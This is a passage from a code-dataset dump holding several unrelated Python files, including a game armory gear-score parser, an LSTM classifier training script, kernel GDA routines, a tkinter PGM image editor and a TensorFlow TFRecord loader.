'__main__':\n\trun(host='0.0.0.0',port=argv[1])","repo_name":"juanjoselopezroldan/prueba_bottle","sub_path":"eventfull.py","file_name":"eventfull.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"18420184567","text":"\"\"\" Character Summary parsing functions \"\"\"\n\nimport re\n\nfrom src.itemParser import getItemInfos\nfrom src.utils import getHtmlText\nfrom src.gearScore import createGearScoreDictionnary\n\n\ndef hasEnchantProfession(profession, minProfLvl):\n \"\"\" Check if character has profession enchant above a determined level \"\"\"\n profLvl = int(re.search(r'\\d+', profession).group(0))\n return profLvl >= minProfLvl\n\n\ndef processItems(itemsList, isBlacksmith, isEnchanter, isHunter, isWarrior):\n \"\"\" Process each items to know if they are fully optimised \"\"\"\n\n notEnchantedItems = []\n notGemmedItems = []\n totalItemLvl = 0\n totalGearScore = 0\n equippedItems = 0\n # Fury war has special calculation method taking in account having 2 2H weaps\n hasAlreadyATwoHandWeapOn = False\n twoHandWeapGearScore = [0, 0]\n # Calling it here so we only create it once per command\n gearScoreDict = createGearScoreDictionnary()\n\n excludedSlots = ['Shirt', 'Tabard']\n itemsToBeEnchant = ['Head', 'Shoulder', 'Back', 'Chest',\n 'Wrist', 'Hands', 'Legs', 'Feet',\n 'One-hand', 'Off Hand', 'Two-hand']\n\n if isEnchanter:\n itemsToBeEnchant.append('Finger')\n if isHunter:\n itemsToBeEnchant.append('Ranged')\n\n # Blacksmith can get another gem slot on some items (badly reported in url)\n itemsToBeBlacksmithEnchant = ['Wrist', 'Hands']\n\n for item in itemsList:\n # Power is there to reach an 'API' (not a real one btw...)\n itemUrl = item.find('a').get('href') + '&power=true'\n infosFromRel = item.find('a').get('rel')\n itemAdditionnalInfos = re.search(\n '&{1}.*', infosFromRel[0]) if infosFromRel is not None else None\n\n if itemAdditionnalInfos is not None:\n itemAdditionnalInfos = itemAdditionnalInfos.group(0)\n itemUrl += itemAdditionnalInfos\n\n if '#self' not in itemUrl:\n itemInfos = getItemInfos(itemUrl, gearScoreDict)\n itemSlot = itemInfos['itemSlot']\n\n hasToHaveBonusGemSlot = itemSlot == 'Waist' or (\n itemSlot in itemsToBeBlacksmithEnchant and isBlacksmith)\n if hasToHaveBonusGemSlot:\n itemInfos = getItemInfos(itemUrl, gearScoreDict, hasToHaveBonusGemSlot)\n\n # Checking what is missing in item\n if itemInfos['missingGems']:\n notGemmedItems.append(itemSlot)\n if itemInfos['missingEnchant'] and itemSlot in itemsToBeEnchant:\n notEnchantedItems.append(itemSlot)\n if itemSlot not in excludedSlots:\n equippedItems += 1\n totalItemLvl += itemInfos['itemLevel']\n totalGearScore += itemInfos['itemGearScore']\n\n # pylint: disable=too-many-boolean-expressions\n if isWarrior and (itemInfos['itemSlot'] == 'Two-hand' or (\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Two-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'One-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Off Hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Held In Off-Hand')\n )):\n minGs = min(twoHandWeapGearScore)\n twoHandWeapMinIndex = twoHandWeapGearScore.index(minGs)\n twoHandWeapGearScore[twoHandWeapMinIndex] = itemInfos['itemGearScore']\n\n # Getting new values after modifications\n minGs = min(twoHandWeapGearScore)\n maxGs = max(twoHandWeapGearScore)\n\n # To calculate gearscore, we have to ignore the second 2H weap GS,\n # get the difference between Main Hand and Off Hand\n # divide it by 2, round it up and substract it to the total sum\n # If difference is equal to 1\n # That means we are crawling first weapon or the character is wearing only\n # one Two hands weapon\n if minGs != 0:\n differenceBetweenTwoHandWeaps = 
int((maxGs - minGs)/2) + 1\n\n if hasAlreadyATwoHandWeapOn:\n totalGearScore -= minGs + differenceBetweenTwoHandWeaps\n else:\n hasAlreadyATwoHandWeapOn = True\n\n if equippedItems != 0:\n avgItemLvl = \"%.2f\" % float(totalItemLvl/equippedItems)\n else:\n avgItemLvl = 0\n\n return {\n 'notEnchantedItems': notEnchantedItems,\n 'notGemmedItems': notGemmedItems,\n 'avgItemLvl': avgItemLvl,\n 'itemGearScore': totalGearScore,\n }\n\n\ndef processList(providedList):\n \"\"\" Process the provided items list \"\"\"\n items = []\n\n for item in providedList.findAll(class_='text'):\n items.append(' '.join(item.text.split()).replace(' / ', '/'))\n\n return items\n\n\ndef getCharInfos(\n url='http://armory.warmane.com/character/Ashaladin/Icecrown/summary', htmlText=None\n):\n \"\"\" Get character informations \"\"\"\n\n if htmlText is None:\n html = getHtmlText(url)\n else:\n html = htmlText\n\n # Ensure char is found before scrap anything else\n if len(html.findAll(string=re.compile(r'Page not found'))) > 0:\n return 'Character not found, please check your informations and try again.'\n\n charMainInfos = html.find(class_='information-left')\n\n # Hunter will need to have Ranged slot checked (enchant)\n isHunter = 'Hunter' in charMainInfos.text\n isWarrior = 'Warrior' in charMainInfos.text\n\n # Grouping variables:\n # First group is html info retrieving\n # Second is extracted data\n charAndGuildName = charMainInfos.find(class_='name').text.split(' ')\n itemsPath = html.findAll(class_='item-slot')\n specsPath = html.find(class_='specialization')\n professionsSummary = []\n professionsPath = html.findAll(class_='profskills')\n isBlacksmith = False\n isEnchanter = False\n\n charName = charAndGuildName.pop(0).strip()\n guildName = ' '.join(charAndGuildName) if charAndGuildName[0] != u'\\xa0' else 'No Guild'\n lvlRaceClass = charMainInfos.find(class_='level-race-class').text.strip()\n\n professions = []\n for professionsType in professionsPath:\n professions.append(processList(professionsType))\n\n # Processing multiple arrays into one (1 array per professionType (main & secondary profs))\n for professionType in professions:\n for profession in professionType:\n # We have to check blacksmith level to ensure the bonus gem slots are available\n if 'Blacksmithing' in profession:\n isBlacksmith = hasEnchantProfession(profession, 400)\n if 'Enchanting' in profession:\n isEnchanter = hasEnchantProfession(profession, 400)\n professionsSummary.append(profession)\n\n getSpecializations = processList(specsPath)\n itemsCheck = processItems(itemsPath, isBlacksmith, isEnchanter, isHunter, isWarrior)\n\n summary = {\n 'url': url,\n 'charName': charName,\n 'guildName': guildName,\n 'lvlRaceClass': lvlRaceClass,\n 'professions': professionsSummary,\n 'specs': getSpecializations,\n 'itemsCheck': itemsCheck\n }\n\n return summary\n","repo_name":"Rdyx/warmane-armory-bot","sub_path":"src/charsumParser.py","file_name":"charsumParser.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
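To make the Fury-warrior correction in the record above concrete: both two-hand weapons are first counted in full, then the lower GearScore plus half the gap is subtracted, so the pair contributes roughly the better weapon minus half the difference. A worked sketch of just that arithmetic, with hypothetical GearScore values:

# hypothetical GearScores for a Fury warrior wearing two two-hand weapons
two_hand_gs = [420, 380]
min_gs, max_gs = min(two_hand_gs), max(two_hand_gs)
difference = int((max_gs - min_gs) / 2) + 1   # 21
total = sum(two_hand_gs)                      # 800, both weapons counted
total -= min_gs + difference                  # 399 == max_gs - difference
print(total)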
+{"seq_id":"26780102096","text":"#liste gibi ama her elemanı bir kez ekleyebiliriz\nlistem=[1,2,3,2,3]\nsetim=set(listem)\nprint(setim)\n#seti direk tanımlama\nset2={\"a\",\"b\",\"c\"}\nset2.add(\"d\")\nprint(set2)\n#boş set tanımlama\nset3=set()\n","repo_name":"semihuzunCE/Python","sub_path":"3-setler.py","file_name":"3-setler.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40739251764","text":"\"\"\"\r\nThis is a test for classify the trajectories.\r\nWE have three kinds of trajectories: | L_D| c_aphi| c_h|\r\n with label: | 0 | 1 | 2 |\r\n\r\nTry to use linear+LSTM+linear NET.\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport os\r\nfrom utils.dataset import dataset,collate_fn\r\nimport torch.nn as nn\r\nimport torch.optim\r\nimport torch.utils.data as Data\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom Classify_net import Classify\r\nfrom utils.d_process import *\r\nfrom torch.optim import lr_scheduler\r\nfrom train_util import train, trainlog\r\nimport logging\r\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n# Hyper Parameters\r\nINPUT_SIZE = 6\r\nOUTPUT_SIZE = 3\r\nTIME_STEP = 1200\r\nLINEAR1_OUT = 32 # D:通过6维输入,提取另外的特征 *2\r\nHIDDEN_SIZE = 64 # 记录调试日志\r\nBATCH_SIZE = 64 #NUM_LATERS = 2 #\r\nLR = 0.01\r\nN_TRAIN_POINTS = 100 #没有用到\r\nEPOCH = 1000 #没有用到\r\nMAX_LEN = 600\r\n\r\nsave_dir = r'F:\\classi\\model_test_1_16/'\r\nif not os.path.exists(save_dir):\r\n os.makedirs(save_dir)\r\nlogfile = '%s/trainlog.log'%save_dir\r\ntrainlog(logfile)\r\n# 原始数据\r\nrawdata_root = r'F:\\classi\\train/'\r\n# 读标签\r\nall_pd = pd.read_csv(r\"F:\\HXDD/dataset_train.csv\", sep=\",\",\r\n header=None,\r\n names=[\"file_name\",\"label\"])[1:] ##加r''的目的在于啥 ,dataset_train.csv好像有点不对\r\n\r\n#print(all_pd.head())\r\n# 训练数据和测试数据划分\r\ntrain_pd, val_pd = train_test_split(all_pd, test_size=0.25, random_state=43,\r\n stratify=all_pd['label']) #去查下这个函数的用法 2020-10-20 有可能指的是标签只有1维\r\n# print(val_pd.shape)\r\n\r\n# 数据预测处理\r\ndata_process = {\r\n 'train':data_process(max_len=MAX_LEN),\r\n 'val':data_process(max_len=MAX_LEN)\r\n}\r\ndata_set={}\r\ndata_set['train']=dataset(trajroot=rawdata_root, anno_pd=train_pd,\r\n dprocess=data_process['train']) #train_pd 应该调成 val_pd,原先为train_pd\r\ndata_set['val']=dataset(trajroot=rawdata_root, anno_pd=val_pd,\r\n dprocess=data_process['val']) #train_pd 应该调成 val_pd,原先为train_pd\r\n# sklearn读取数据,数据打包\r\ndataloader={}\r\ndataloader['train']=torch.utils.data.DataLoader(data_set['train'],batch_size=BATCH_SIZE,\r\n shuffle=True,num_workers=0,collate_fn=collate_fn) #参数决定了由几个进程来处理\r\n\r\ndataloader['val']=torch.utils.data.DataLoader(data_set['val'],batch_size=BATCH_SIZE,\r\n shuffle=True,num_workers=0,collate_fn=collate_fn)\r\n\r\n'''model'''\r\nmodel = Classify()\r\nbase_lr = 0.01\r\nresume = None\r\n# 第一次运行使用resume=None\r\n# resume=None\r\nif resume:\r\n # 加载已有模型\r\n model.eval()\r\n model.load_state_dict(torch.load(resume))\r\nmodel.double() # cuda之前需要将数据转换\r\nmodel.cuda()\r\n\r\n\r\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001,betas=(0.9, 0.999), eps= 1e-08, weight_decay=1e-5)\r\ncriterion = nn.CrossEntropyLoss()\r\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1) # 设置学习率,lr*gama^(epoch/step_size)\r\nif __name__ == '__main__':\r\n train(model,\r\n epoch_num=100,\r\n start_epoch=0,\r\n optimizer=optimizer,\r\n criterion=criterion,\r\n exp_lr_scheduler=exp_lr_scheduler,\r\n data_set=data_set,\r\n data_loader=dataloader,\r\n save_dir=save_dir,\r\n print_inter=50,\r\n val_inter=400)\r\n\r\n","repo_name":"Xie-JunWei/lstm-network","sub_path":"classify/classify_train.py","file_name":"classify_train.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71150670171","text":"from wb0configs import configs\nfrom wb0configs.helpers import store_file, load_file\nfrom collections import defaultdict\nimport random\nimport torch\nfrom tqdm import tqdm\n\n\ndef pool_sections_embed(e_id_sec_embed):\n print(\"pool_sections_embed\")\n\n e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n #e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n\n if e_id_embed == None:\n e_id_embed = dict()\n\n for e, sec in e_id_sec_embed.items():\n e_id_embed[e] = torch.mean(torch.stack(list(sec.values())), dim=0)\n\n store_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", e_id_embed, \"pkl\", \"csv\")\n return e_id_embed\n\n\n\ndef create_node_features(node_list, e_id_embed):\n print(\"create_node_features\")\n\n #node_features = torch.Tensor(len(node_list),768)\n node_features = dict()\n\n for i, (e_id, e_features) in enumerate(node_list):\n if e_id in e_id_embed.keys():\n e_emb = e_id_embed[e_id]\n #node_features[i] = e_emb\n node_features[e_id] = e_emb\n else: ## for some entities there exist no embeddings\n e_id= random.choice(node_list)[0]\n e_emb = e_id_embed[e_id]\n #node_features[i] = e_emb\n node_features[e_id] = e_emb\n\n return node_features\n\n\n\ndef create_edge_features(aggr_edge_list, c_id_ent_id_embed):\n print(\"create_edge_features\")\n\n #edge_features = torch.Tensor(len(aggr_edge_list), 768)\n edge_features = defaultdict(torch.FloatTensor)\n\n for i, (e_id_1, e_id_2, c_features) in tqdm(enumerate(aggr_edge_list)):\n c_ids = c_features[\"conflict_ids\"]\n for c_id in c_ids:\n #edge_features[i] = c_id_ent_id_embed[c_id][0]\n edge_features[(e_id_1, e_id_2)] = torch.cat((edge_features[(e_id_1, e_id_2)], c_id_ent_id_embed[c_id].view(1,-1)),0)\n edge_features[(e_id_1, e_id_2)] = torch.mean(edge_features[(e_id_1, e_id_2)], 0)\n return edge_features\n\n\nif __name__ == \"__main__\":\n\n config = configs.ConfigBase()\n\n node_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"node_list\", ftype = \"pkl\")\n e_id_sec_embed = load_file(config.get_path(\"entity_embed\") / \"e_id_sec_embed_tfidf\", ftype=\"pkl\")\n e_id_embed = pool_sections_embed(e_id_sec_embed)\n\n node_features = create_node_features(node_list, e_id_embed)\n\n aggr_edge_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"aggr_edge_list\", ftype = \"pkl\")\n c_id_ent_id_embed = load_file(config.get_path(\"conflict_embed\") / \"c_id_ent_id_embed_tfidf\", ftype=\"pkl\")\n edge_features = create_edge_features(aggr_edge_list, c_id_ent_id_embed)\n\n store_file(config.get_path(\"task\") / \"network_features\" / \"node_features\", node_features, \"pkl\", \"csv\")\n store_file(config.get_path(\"task\") / \"network_features\" / \"edge_features\", edge_features, \"pkl\", \"csv\")\n\n","repo_name":"conflict-AI/conflictwiki","sub_path":"code/wb4task/task_construction/network_features.py","file_name":"network_features.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"}
+{"seq_id":"27898216650","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.metrics.pairwise import rbf_kernel, polynomial_kernel,linear_kernel\n\n\n\nclass centred_kernel(object):\n def __init__(self, kernel, centred=True, gamma=None, degree=3, coef0=1):\n self._kernel_type = kernel\n self._gamma = gamma\n self._degree = degree\n self._coef0 = coef0\n self._centred = centred\n\n def fit(self, X):\n self._X = X.copy()\n return self\n\n def fit_transform(self, X):\n self._X = X.copy()\n self._n = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, degree=self._degree, coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n\n \"\"\"\n sumK = np.sum(K, 0)\n K1 = 1. / self._n * np.tile(np.reshape(sumK, (-1, 1)), (1, self._n))\n K2 = 1. / self._n * np.tile(np.reshape(sumK, (1, -1)), (self._n, 1))\n self._K = K.copy()\n Ko = K - K1 - K2 + np.mean(K)\n else:\n Ko = K\n return Ko\n\n def transform(self, X):\n nt = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, self._X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, self._X, degree=self._degree,\n coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X, self._X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n \"\"\"\n K1 = (K - 1. / self._n * np.ones((nt, self._n)).dot(self._K))\n K2 = np.eye(self._n) - 1. / self._n * np.ones((self._n, self._n))\n Ko = K1.dot(K2)\n else:\n Ko = K\n return Ko\n\n\n\ndef sorted_spectrum(A):\n complex_eig_val, complex_eig_vec = np.linalg.eig(A)\n eig_val = complex_eig_val.real\n orden = np.argsort(eig_val)[::-1]\n eig_val = eig_val[orden]\n eig_vec = complex_eig_vec.real\n eig_vec = eig_vec[:,orden]\n return eig_val, eig_vec\n\ndef kgda(K, y, tau = 1e-6):\n # K already centred!!\n n = K.shape[0]\n v_classes = np.unique(y)\n M_ = np.mean(K,1)\n P = len(v_classes)\n M_Mp = np.empty((n,P))\n #Sb\n Sb = np.zeros((n,n))\n Sw = np.zeros((n,n))\n for p in range(P):\n idx_class_p = np.where(y==v_classes[p])[0]\n n_p = len(idx_class_p)\n Kp = K[:,idx_class_p]\n Mp = np.mean(Kp,1)\n M_Mp[:,p] = Mp.copy()\n MpM_ = Mp - M_\n Sb += n_p* np.outer(MpM_, MpM_.T) # column * row\n Sw += 1./n_p* Kp.dot(Kp.T) - np.outer(Mp, Mp.T)\n #Sw inv\n if np.linalg.matrix_rank(Sw) < n:\n Sw += tau*np.eye(n)\n iSw = np.linalg.inv(Sw)\n AA = iSw.dot(Sb)\n DD2, UU2 = sorted_spectrum(AA)\n lam = DD2[:P-1]\n A = UU2[:,:P-1]\n VMp = A.T.dot(M_Mp)\n return A, VMp.T\n\ndef predict_kgda(K_test, A, Q, v_classes=None):\n # Ktest centred!!\n # Q projection of class means!!\n if v_classes is None:\n P = Q.shape[0]\n v_classes = np.array([int(cc) for cc in range(P)])\n U = K_test.dot(A)\n Distance_sample_mean = pairwise_distances(U, Q)\n closest_mean = np.argmin(Distance_sample_mean,1)\n output = np.array([v_classes[ii] for ii in closest_mean])\n return output, U","repo_name":"fredchettouh/uc3m_ml","sub_path":"kernel_mva/klda.py","file_name":"klda.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29133475410","text":"import numpy\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\n\r\n#Reading of the original file\r\ndef get_pgm_data():\r\n try:\r\n global filename\r\n filename = e.get()\r\n with open(filename, \"r\") as f:\r\n content = f.readlines()\r\n global size\r\n size=[]\r\n global Lmax \r\n Lmax=0\r\n global data\r\n data=[]\r\n global comments\r\n comments=[]\r\n for line in list(content):\r\n if line[0] == \"#\":\r\n comments.append(line)\r\n content.remove(line)\r\n if content[0].strip() != \"P2\":\r\n e.delete(0, END)\r\n status['text'] = \"Това не е PGM файл\"\r\n else:\r\n size = [int(el) for el in content[1].strip().split()]\r\n Lmax = int(content[2].strip())\r\n for line in content[3:]:\r\n for el in line.split():\r\n data.append(int(el))\r\n #get_file_button['state'] = DISABLED #if you remove the comment the program will work only with 1 file \r\n status['text'] = \"Файлът беше успешно зареден\"\r\n open_file['state'] = ACTIVE\r\n except OSError:\r\n status['text'] = \"Файлът не е намерен\"\r\n \r\n#Showing the original image on the screen\r\ndef open_original_pgm():\r\n original_image = Toplevel(root)\r\n original_image.iconbitmap(\"img\\\\icona.ico\")\r\n original_image.title(filename)\r\n original_image.resizable(0,0)\r\n original_image.transient(root)\r\n #using nympy array to get the image information\r\n new_data = numpy.array(data).reshape(size[1], size[0])\r\n #creating and displaying of the image on the screen\r\n img = ImageTk.PhotoImage(image = Image.fromarray(new_data))\r\n c = Canvas(original_image, width=size[0], height=size[1])\r\n c.pack()\r\n c.create_image(0,0, anchor=\"nw\", image = img)\r\n #right click mouse event for showing the additional field on the screen\r\n c.bind(\"\", enable_mod)\r\n koef_text = Label(original_image, text=\"коефициент:\")\r\n koef_text.pack(side=LEFT)\r\n\r\n k_v = Entry(original_image, width=15)\r\n k_v.pack(side=LEFT)\r\n\r\n stepen_text = Label(original_image,text=\"степен:\")\r\n stepen_text.pack(side=LEFT)\r\n\r\n img4 = PhotoImage(file=\"img\\\\adjust.png\")\r\n\r\n s_v = Entry(original_image, width=15)\r\n s_v.pack(side=LEFT)\r\n #calling the input validation function for both fields to ensure only numerals are entered\r\n reg = original_image.register(only_numbers)\r\n k_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n s_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n #lambda function to use the inputs from the fields otherwise tkinter can't use them\r\n x = lambda:open_modified_pgm(float(k_v.get()), float(s_v.get()))\r\n\r\n global modify\r\n modify = Button(original_image, image=img4, compound=\"left\", text= \"Промени\", state=DISABLED, command=x)\r\n modify.pack(side=RIGHT)\r\n\r\n #positioning of the image according to the main window\r\n original_image.update_idletasks()\r\n windowWidth = original_image.winfo_reqwidth()\r\n windowHeight = original_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(original_image.winfo_screenwidth()/2 - windowWidth/2-(windowHeight/2))\r\n positionDown = int(original_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n original_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n original_image.mainloop()\r\n \r\n#Showing the moified image on the screen\r\ndef open_modified_pgm(k,s):\r\n modified_image = Toplevel(root)\r\n modified_image.iconbitmap(\"img\\\\icona.ico\")\r\n 
modified_image.title(filename.rstrip(\".pgm\")+\"_mod.pgm\")\r\n modified_image.resizable(0,0)\r\n modified_image.transient(root)\r\n global data1\r\n #creating and modifying of the new image \r\n data1 = numpy.array(data).reshape(size[1], size[0])\r\n with numpy.nditer(data1, op_flags=['readwrite']) as it:\r\n for x in it:\r\n x[...] = Lmax*(x/Lmax)**(k/s)\r\n img = ImageTk.PhotoImage(image = Image.fromarray(data1))\r\n c = Canvas(modified_image, width=size[0], height=size[1])\r\n c.pack()\r\n c.create_image(0,0, anchor=\"nw\", image = img)\r\n img5 = PhotoImage(file=\"img\\\\sd-card.png\")\r\n open_file = Button(modified_image, image=img5, compound=\"left\", text= \"Запази\", command=save_new_pgm, state=ACTIVE)\r\n open_file.pack(side=BOTTOM)\r\n modify['state'] = DISABLED\r\n status['text'] = \"Модификация на файла...\"\r\n #positioning of the image according to the main window\r\n modified_image.update_idletasks()\r\n windowWidth = modified_image.winfo_reqwidth()\r\n windowHeight = modified_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(modified_image.winfo_screenwidth()/2 - windowWidth/2+(windowHeight/2))\r\n positionDown = int(modified_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n modified_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n modified_image.mainloop()\r\n \r\n#saving the modified mage as a file\r\ndef save_new_pgm():\r\n with open(filename.rstrip(\".pgm\")+\"_mod.pgm\", \"w\") as f:\r\n f.writelines(\"P2\\n\")\r\n f.writelines(\"# modified by PGM Read&Modify\\n\")\r\n for line in list(comments):\r\n #if the file was aleady modified by the program, making sure to remove the comment\r\n if line.strip() == \"# modified by PGM Read&Modify\":\r\n comments.remove(line)\r\n else:\r\n f.writelines(line)\r\n f.writelines(str(size[0])+\" \"+str(size[1])+\"\\n\")\r\n f.writelines(str(Lmax)+\"\\n\")\r\n #formating the image information so it can be dispalyed properly by any app\r\n for line in data1.tolist():\r\n f.writelines(str(line)[str(line).find(\"[\")+1 : str(line).find(\"]\")].replace(\",\", \"\")+\"\\n\") \r\n status['text'] = \"Файлът беше записан успешно като \"+filename.rstrip(\".pgm\")+\"mod.pgm\"\r\n\r\n#input validation to make sure the iput is either a number, a space or a dot f0r floatng numbers\r\ndef only_numbers(inp):\r\n if inp.isdigit():\r\n return True\r\n elif inp == \"\":\r\n return True\r\n elif inp == \".\":\r\n return True\r\n else:\r\n return False\r\n\r\n#changing the state of \"Change\" button(\"Промени\")\r\ndef enable_mod(event):\r\n modify['state'] = ACTIVE\r\n\r\n#using this to be able to call get_pgm_data via enter button\r\ndef call_get_pgm(event):\r\n get_pgm_data()\r\n\r\n#function to use in event to create a popup menu\r\ndef popup(event):\r\n try:\r\n popup_menu.tk_popup(event.x_root, event.y_root,0)\r\n finally:\r\n popup_menu.grab_release()\r\n\r\n\r\n\r\n#Creating of the main window\r\nroot = Tk()\r\nroot.iconbitmap(\"img\\\\icona.ico\")\r\nroot.title(\"PGM Read&Modify\")\r\nroot.resizable(0,0) #this disables rezising of the window\r\n#root.attributes(\"-toolwindow\",1) #hides the window control button under windows. As a side effect it also hides the program icon.\r\n#root.overrideredirect(1) #hides all the elements of the window control manager. 
Bad idea to use under winodws, works on linux or mac though.\r\n\r\n#Creating the top frame where the buttons and path to file elements reside\r\ntop_frame = Frame(root)\r\ntop_frame.pack(side=TOP, fill=X)\r\n\r\n#Creating of the bottom frame to hold the status bar element\r\nbottom_frame = Frame(root)\r\nbottom_frame.pack(side=BOTTOM, fill=X)\r\nfilename = Label(top_frame, text=\"Файл:\")\r\nfilename.pack(side=LEFT, anchor=W)\r\ne = Entry(top_frame, width=67)\r\ne.pack(side=LEFT)\r\ne.focus()\r\ne.bind(\"\", call_get_pgm)\r\n\r\n#Creates the popup menu with an option to exit the program\r\npopup_menu = Menu(root, tearoff=0)\r\npopup_menu.add_command(label=\"Exit\", command=root.destroy)\r\n\r\n#Creating the images for the buttons\r\nimg = ImageTk.PhotoImage(Image.open(\"img\\\\pgm.jpg\"))\r\nimg1 = PhotoImage(file = \"img\\\\file.png\")\r\nimg2 = PhotoImage(file =\"img\\\\display.png\")\r\nbackground = Label(bottom_frame,image=img)\r\nbackground.pack(side=TOP)\r\n\r\nstatus_text = Label(bottom_frame, text=\"статус:\", bd=1, relief=SUNKEN)\r\nstatus_text.pack(side=LEFT)\r\n\r\nstatus = Label(bottom_frame, text=\"Изчакване\", bd=1, relief=SUNKEN, anchor=W)\r\nstatus.pack(side=BOTTOM, fill=X)\r\n\r\nroot.bind(\"\", popup)\r\n\r\nget_file_button = Button(top_frame, image=img1, text=\"Отвори\", command=get_pgm_data, state=ACTIVE, compound=\"left\")\r\nget_file_button.pack(side=RIGHT)\r\n\r\nopen_file = Button(top_frame, image=img2, text= \"Покажи\", command=open_original_pgm, state=DISABLED, compound=\"left\")\r\nopen_file.pack(side=LEFT)\r\n\r\n#Centering of the main window according to screen resolution\r\nroot.withdraw()\r\nroot.update_idletasks()\r\nx = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\r\ny = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\r\nroot.geometry(\"+%d+%d\" % (x, y))\r\nroot.deiconify()\r\n\r\nroot.mainloop()\r\n","repo_name":"mazirah/PGM-Read-Modify","sub_path":"pgm read&modify.py","file_name":"pgm read&modify.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
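The pixel transform applied in open_modified_pgm above is a power-law (gamma-style) curve, x -> Lmax*(x/Lmax)**(k/s); a standalone sketch showing its effect on a few grey levels (exponent k/s < 1 brightens the mid-tones):

import numpy as np

Lmax = 255
k, s = 1.0, 2.0   # k/s = 0.5, i.e. a square-root curve
x = np.array([0, 64, 128, 192, 255], dtype=float)
y = Lmax * (x / Lmax) ** (k / s)
print(y.round())  # [  0. 128. 181. 221. 255.]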
+{"seq_id":"26727665845","text":"\"\"\"Datasets utilities.\"\"\"\n\nfrom __future__ import annotations\n\nimport albumentations\nimport numpy as np\nimport tensorflow as tf\n\nfrom pathlib import PurePath\nfrom rasterio.io import MemoryFile\n\n\ndef augment_image_dataset(dataset: tf.data.Dataset,\n transforms: albumentations.Compose,\n augment_labels: bool = False) -> tf.data.Dataset:\n \"\"\"Augments a non-batched dataset using the given transforms.\"\"\"\n\n def _augment(image, label):\n if augment_labels:\n data = {\"image\": image, \"mask\": label}\n augmented = transforms(**data)\n return augmented[\"image\"], augmented[\"mask\"]\n else:\n data = {\"image\": image}\n augmented = transforms(**data)\n return augmented[\"image\"], label\n\n def _augment_tensors(image_tensor, label_tensor):\n return tf.numpy_function(func=_augment,\n inp=[image_tensor, label_tensor],\n Tout=[image_tensor.dtype, label_tensor.dtype])\n\n return dataset.map(_augment_tensors,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=True)\n\n\ndef tfrecords_as_geospatial_dataset(\n file_pattern: PurePath = None,\n batch_size: int = 1,\n repeat: bool = False,\n shuffle_buffer_size: int = 0,\n prefetch_buffer_size: int = tf.data.AUTOTUNE,\n transforms: albumentations.Compose = None,\n tfr_channel_keys: list[str] = None,\n tfr_channel_rewrite_map: dict[str, tuple[int, int]] = None,\n tfr_label_key: str = \"label\") -> tf.data.Dataset:\n \"\"\"Builds a geospatial raster dataset from TFRecords.\"\"\"\n\n if not file_pattern:\n raise ValueError(\"Must provide a non-empty file pattern.\")\n if not tfr_channel_keys:\n raise ValueError(\"Must provide a non-empty list of channel keys.\")\n\n shuffle = (shuffle_buffer_size > 0)\n deterministic = (not shuffle)\n\n if tfr_channel_rewrite_map:\n channel_rewrite_map = {\n tfr_channel_keys.index(k): v\n for k, v in tfr_channel_rewrite_map.items()\n }\n else:\n channel_rewrite_map = {}\n\n def _parse_example(serialized):\n \"\"\"Parses a serialized tf.train.Example into an (image, label) tuple.\"\"\"\n # pylint: disable=no-value-for-parameter\n\n all_keys = 